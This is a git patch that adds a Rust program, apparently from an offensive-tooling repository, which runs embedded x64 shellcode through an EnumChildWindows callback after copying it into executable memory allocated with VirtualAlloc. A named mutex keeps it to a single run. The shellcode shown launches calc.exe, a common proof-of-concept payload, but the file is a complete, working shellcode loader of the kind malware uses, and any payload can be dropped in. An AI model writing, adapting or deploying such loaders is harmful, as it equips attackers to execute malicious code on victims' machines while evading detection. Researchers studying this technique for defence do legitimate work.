From 2822a1abf22076d1244cab01601f3658599fa121 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Smukx=20=E2=99=A0?=
 <96696929+Whitecat18@users.noreply.github.com>
Date: Wed, 9 Oct 2024 21:19:40 +0530
Subject: [PATCH] Shell Exec through CreateMutex

---
 Process-Injection/CreateMutex.rs | 87 ++++++++++++++++++++++++++++++++
 1 file changed, 87 insertions(+)
 create mode 100644 Process-Injection/CreateMutex.rs

diff --git a/Process-Injection/CreateMutex.rs b/Process-Injection/CreateMutex.rs
new file mode 100644
index 0000000..765ae57
--- /dev/null
+++ b/Process-Injection/CreateMutex.rs
@@ -0,0 +1,87 @@
+/*
+  Shellcode Execute using CreateMutexA
+  @5mukx
+*/
+
+use std::ffi::CString;
+use std::ptr::null_mut;
+use user32::EnumChildWindows;
+use winapi::shared::winerror::ERROR_ALREADY_EXISTS;
+use winapi::um::errhandlingapi::GetLastError;
+use winapi::um::handleapi::CloseHandle;
+use winapi::um::memoryapi::VirtualAlloc;
+use winapi::ctypes::c_void;
+use winapi::um::synchapi::CreateMutexA;
+use winapi::um::winnt::RtlMoveMemory;
+
+extern "system" fn shell_exec_mutex() {
+
+    let shellcode: [u8; 276] = [
+        0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
+        0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
+        0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9,
+        0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
+        0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48,
+        0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
+        0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48,
+        0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
+        0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c,
+        0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
+        0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04,
+        0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
+        0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48,
+        0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f,
+        0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
+        0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
+        0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
+        0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
+    ];
+
+    unsafe{
+        let mem: *mut c_void = VirtualAlloc(
+            null_mut(),
+            shellcode.len(),
+            0x1000, 
+            0x40,
+        );
+
+        if !mem.is_null(){
+            RtlMoveMemory(
+                mem, 
+                shellcode.as_ptr() as *const winapi::ctypes::c_void, 
+                shellcode.len()
+            );
+
+            EnumChildWindows(null_mut(), Some(std::mem::transmute(mem)), 0);
+        }
+    }
+}
+
+
+
+fn main() {
+    let mutex_name = CString::new("MeowMeowMutex").unwrap();
+    
+    unsafe{
+        let h_mutex: *mut c_void = CreateMutexA(
+            null_mut(),
+            0,
+            mutex_name.as_ptr(),
+        );
+
+        if GetLastError() == ERROR_ALREADY_EXISTS {
+            if !h_mutex.is_null() && GetLastError() == ERROR_ALREADY_EXISTS{
+                CloseHandle(h_mutex);
+                return;
+            }
+        }
+        
+        shell_exec_mutex();
+
+        if !h_mutex.is_null(){
+            CloseHandle(h_mutex);
+        }
+
+    }
+}